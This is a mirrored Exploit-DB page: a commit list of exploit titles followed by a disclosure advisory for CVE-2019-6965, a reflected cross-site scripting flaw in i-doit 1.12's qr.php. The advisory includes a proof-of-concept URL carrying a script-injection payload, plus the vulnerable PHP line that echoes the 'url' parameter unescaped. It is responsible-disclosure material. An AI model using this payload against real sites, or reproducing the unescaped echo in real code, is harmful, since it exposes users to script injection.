bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/46620.txt
Offensive Security e4e3f1c741 DB: 2019-03-29 
15 changes to exploits/shellcodes

Microsoft Visio 2016 16.0.4738.1000 - 'Log in accounts' Denial of Service
gnutls 3.6.6 - 'verify_crt()' Use-After-Free

Microsoft Windows Task Scheduler (Windows XP/2000) - '.job' (MS04-022)
Microsoft Windows Task Scheduler (XP/2000) - '.job' (MS04-022)
Multiple Vendor BIOS - Keyboard Buffer Password Persistence Weakness (1)
Multiple Vendor BIOS - Keyboard Buffer Password Persistence Weakness (2)
Multiple Vendor BIOS - Keyboard Buffer Password Persistence (1)
Multiple Vendor BIOS - Keyboard Buffer Password Persistence (2)

NXP Semiconductors MIFARE Classic Smartcard - Multiple Security Weaknesses
NXP Semiconductors MIFARE Classic Smartcard - Multiple Vulnerabilities

Accellion Secure File Transfer Appliance - Multiple Command Restriction Weakness Privilege Escalations
Accellion Secure File Transfer Appliance - Multiple Command Restriction / Privilege Escalations

EncFS 1.6.0 - Flawed CBC/CFB Cryptography Implementation Weaknesses
EncFS 1.6.0 - Flawed CBC/CFB Cryptography Implementation
PonyOS 3.0 - VFS Permissions
PonyOS 3.0 - ELF Loader Privilege Escalation
PonyOS 3.0 - TTY 'ioctl()' Kernel Local Privilege Escalation
Linux Kernel (PonyOS 3.0) - VFS Permissions Local Privilege Escalation
Linux Kernel (PonyOS 3.0) - ELF Loader Local Privilege Escalation
Linux Kernel (PonyOS 3.0) - TTY 'ioctl()' Local Privilege Escalation

PonyOS 4.0 - 'fluttershy' LD_LIBRARY_PATH Kernel Privilege Escalation
Linux Kernel (PonyOS 4.0) - 'fluttershy' LD_LIBRARY_PATH Local Privilege Escalation
Microsoft Windows Manager (Windows 7 x86) - Menu Management Component UAF Privilege Elevation
Microsoft Windows Kernel (Windows 7 x86) - Local Privilege Escalation (MS17-017)
Microsoft Windows Kernel (Windows 7 x86) - Local Privilege Escalation (MS16-039)
Microsoft Windows Manager (7 x86) - Menu Management Component UAF Privilege Elevation
Microsoft Windows Kernel (7 x86) - Local Privilege Escalation (MS17-017)
Microsoft Windows Kernel (7 x86) - Local Privilege Escalation (MS16-039)

Microsoft Windows MSHTML Engine - _Edit_ Remote Code Execution
Microsoft Windows MSHTML Engine - 'Edit' Remote Code Execution

Base64 Decoder 1.1.2 - Local Buffer Overflow (SEH Egghunter)

Linux Kernel 2.2 - TCP/IP Weakness Spoof IP
Linux Kernel 2.2 - TCP/IP Spoof IP

Microsoft Windows Media Encoder (Windows XP SP2) - 'wmex.dll' ActiveX Buffer Overflow (MS08-053)
Microsoft Windows Media Encoder (XP SP2) - 'wmex.dll' ActiveX Buffer Overflow (MS08-053)
Qualcomm Eudora 6.0.1/6.1.1 - Attachment LaunchProtect Warning Bypass Weakness (1)
Qualcomm Eudora 6.0.1/6.1.1 - Attachment LaunchProtect Warning Bypass Weakness (2)
Qualcomm Eudora 6.0.1/6.1.1 - Attachment LaunchProtect Warning Bypass (1)
Qualcomm Eudora 6.0.1/6.1.1 - Attachment LaunchProtect Warning Bypass (2)
Microsoft Internet Explorer 5/6 / Mozilla 1.2.1 - URI Display Obfuscation Weakness (1)
Microsoft Internet Explorer 5/6 / Mozilla 1.2.1 - URI Display Obfuscation Weakness (2)
Microsoft Internet Explorer 5/6 / Mozilla 1.2.1 - URI Display Obfuscation (1)
Microsoft Internet Explorer 5/6 / Mozilla 1.2.1 - URI Display Obfuscation (2)
PHP 5.2.6 - 'create_function()' Code Injection Weakness (2)
PHP 5.2.6 - 'create_function()' Code Injection Weakness (1)
PHP 5.2.6 - 'create_function()' Code Injection (2)
PHP 5.2.6 - 'create_function()' Code Injection (1)
GNU Classpath 0.97.2 - 'gnu.java.security.util.PRNG' Class Entropy Weakness (1)
GNU Classpath 0.97.2 - 'gnu.java.security.util.PRNG' Class Entropy Weakness (2)
GNU Classpath 0.97.2 - 'gnu.java.security.util.PRNG' Class Entropy (1)
GNU Classpath 0.97.2 - 'gnu.java.security.util.PRNG' Class Entropy (2)
WebKit - Insufficient Entropy Random Number Generator Weakness (1)
WebKit - Insufficient Entropy Random Number Generator Weakness (2)
WebKit - Insufficient Entropy Random Number Generator (1)
WebKit - Insufficient Entropy Random Number Generator (2)

SonicWALL - SessId Cookie Brute Force Weakness Admin Session Hijacking
SonicWALL - 'SessId' Cookie Brute Force / Admin Session Hijacking

Microsoft Windows Windows 8/8.1/2012 R2 (x64) - 'EternalBlue' SMB Remote Code Execution (MS17-010)
Microsoft Windows 8/8.1/2012 R2 (x64) - 'EternalBlue' SMB Remote Code Execution (MS17-010)

Microsoft Windows Windows 7/2008 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010)
Microsoft Windows 7/2008 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010)

Microsoft Windows Windows 7/8.1/2008 R2/2012 R2/2016 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010)
Microsoft Windows 7/8.1/2008 R2/2012 R2/2016 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010)

elFinder PHP Connector < 2.1.48 - exiftran Command Injection (Metasploit)
elFinder PHP Connector < 2.1.48 - 'exiftran' Command Injection (Metasploit)

Jenkins 2.137 and Pipeline Groovy Plugin 2.61 - ACL Bypass and Metaprogramming RCE (Metasploit)
Jenkins 2.137 and Pipeline Groovy Plugin 2.61 - ACL Bypass and Metaprogramming Remote Code Execution (Metasploit)
CMS Made Simple (CMSMS) Showtime2 - File Upload RCE (Metasploit)
Oracle Weblogic Server Deserialization RCE - Raw Object (Metasploit)
Typo3 3.5 b5 - HTML Hidden Form Field Information Disclosure Weakness (1)
Typo3 3.5 b5 - HTML Hidden Form Field Information Disclosure Weakness (2)
Typo3 3.5 b5 - HTML Hidden Form Field Information Disclosure (1)
Typo3 3.5 b5 - HTML Hidden Form Field Information Disclosure (2)

LemonLDAP:NG 0.9.3.1 - User Enumeration Weakness / Cross-Site Scripting
LemonLDAP:NG 0.9.3.1 - User Enumeration / Cross-Site Scripting

Novell Teaming 1.0 - User Enumeration Weakness / Multiple Cross-Site Scripting Vulnerabilities
Novell Teaming 1.0 - User Enumeration / Multiple Cross-Site Scripting Vulnerabilities

MotoCMS - admin/data/users.xml Access Restriction Weakness Information Disclosure
MotoCMS - 'admin/data/users.xml' Access Restriction / Information Disclosure

Coppermine Gallery < 1.5.44 - Directory Traversal Weaknesses
Coppermine Gallery < 1.5.44 - Directory Traversal

Tenda W308R v2 Wireless Router 5.07.48 - Cookie Session Weakness Remote DNS Change
Tenda W308R v2 Wireless Router 5.07.48 - (Cookie Session) Remote DNS Change

Cobub Razor 0.8.0 - Physical path Leakage
Cobub Razor 0.8.0 - Physical Path Leakage
Thomson Reuters Concourse & Firm Central < 2.13.0097 - Directory Traversal / Local File Inclusion
Airbnb Clone Script - Multiple SQL Injection
Fat Free CRM 0.19.0 - HTML Injection
WordPress Plugin Anti-Malware Security and Brute-Force Firewall 4.18.63 - Local File Inclusion
WordPress Plugin Loco Translate 2.2.1 - Local File Inclusion
i-doit 1.12 - 'qr.php' Cross-Site Scripting
Job Portal 3.1 - 'job_submit' SQL Injection
BigTree 4.3.4 CMS - Multiple SQL Injection
Jettweb PHP Hazır Rent A Car Sitesi Scripti V2 - 'arac_kategori_id' SQL Injection
2019-03-29 05:01:59 +00:00

70 lines
No EOL
1.8 KiB
Text
Raw Blame History

# Exploit Title: i-doit 1.12 Cross Site Scripting on qr.php file
# Date: 28-03-2019
# Software Link: https://www.i-doit.org/
# Version: 1.12
# Exploit Author: BlackFog Team
# Contact: info@securelayer7.net
# Website: https://securelayer7.net
# Category: webapps
# Tested on: Firefox in Kali Linux.
# CVE: CVE-2019-6965
Vendor Description
==================
i-doit offers you a professional IT-documentation solution based on ITIL
guidelines. You can document IT systems and their changes, define emergency
plans, display vital information and ensure a stable and efficient
operation of IT networks.
Attack Type
==================
Reflected Cross Site Scripting on qr.php file in URL perameter reported By
Touhid M.Shaikh(@touhidshaikh22).
Proof of Concept
==================
https://IP_ADDRESS/src/tools/php/qr/qr.php?url=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E
Vulnerable Code.
==================
---------------------------------- qr.php Source Code
-----------------------------
..................................... SNIP
........................................
$l_url = @$_GET['url']; <--- Vulnerable
Perameter
..................................... SNIP
........................................
<img id="code" src="<?php echo $l_url; ?>images/ajax-loading.gif"
alt="Error loading the QR Code" /> <--- Display Here without any
validation.
------------------------------qr.php Source Code ends
---------------------------
Fixed
======
Update to latest
Timeline
========
10 Jan, 2018 === Update to Customer
11 Jan, 2018 === Got Mail to Trigger the issue and we are able to repoduce
the same.
15 Jan, 2018 === Provided Hotfix.
17 Jan, 2018 === Got Thanks for responsible disclosure and agree to publish
on public.
Reference in a new issue View git blame Copy permalink